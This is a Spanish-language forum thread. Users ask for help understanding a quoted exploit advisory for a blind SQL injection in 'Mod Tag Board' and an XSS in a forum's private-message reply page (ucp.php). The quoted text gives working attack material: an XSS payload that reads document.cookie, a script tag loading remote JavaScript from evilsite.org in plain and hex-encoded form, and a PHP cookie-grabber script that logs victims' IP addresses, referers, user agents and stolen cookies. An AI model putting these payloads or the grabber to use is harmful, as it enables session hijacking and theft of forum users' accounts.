Temas

[Mod Tag Board]

Hola tengo una duda, mas que todo de traduccion

en las indicaciones dice esto

(Mod Tag Board ) Remote Blind SQL Injection Exploit 


Works regardless PHP.ini settings

que quiere decir esto: Remote Blind SQL Injection Exploit  y Mod Tag Board

Hola, e encontrado este xss

CODE
Use: http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss
]&p=6779


Where [xss] need to be changed and replaced with several javascript and/or vBscript, etc (It's all up to your imaginations) - I'm not going to gave out any step-by-step tutorial for doing this, do your own experiment(s):

CODE
";!–"<script>alert(document.cookie);</script>=&{(alert(1))}


In order to do any redirection, you can go and use these script(s):

CODE
ASCII - <script src=http://www.evilsite.org/WaRWolFz/file.js>
Hex - %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%
70%3a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f%72%67%2f%66
%69%6c%65%2e%6a%73%3e


And in order to put the cookies grabber, you can use this php script:

CODE
    $ip = $_SERVER['REMOTE_ADDR'];
    $referer = $_SERVER['HTTP_REFERER'];
    $agent = $_SERVER['HTTP_USER_AGENT'];

    $data = $_GET['warwolfz'];
    $time = date("Y-m-d G:i:s A");
    $text = "Time: ".$time."nIP:".$ip."nReferer:".$referer."nUser-Agent:".$agent."nCookie:".$data."nn";

    $file = fopen('cookies.html' , 'a');
    fwrite($file,$text);
    fclose($file);

    ?>

segun dicen, es en los mps pero no entiendo su funcionamiento

alguien me podria explicar de que trata?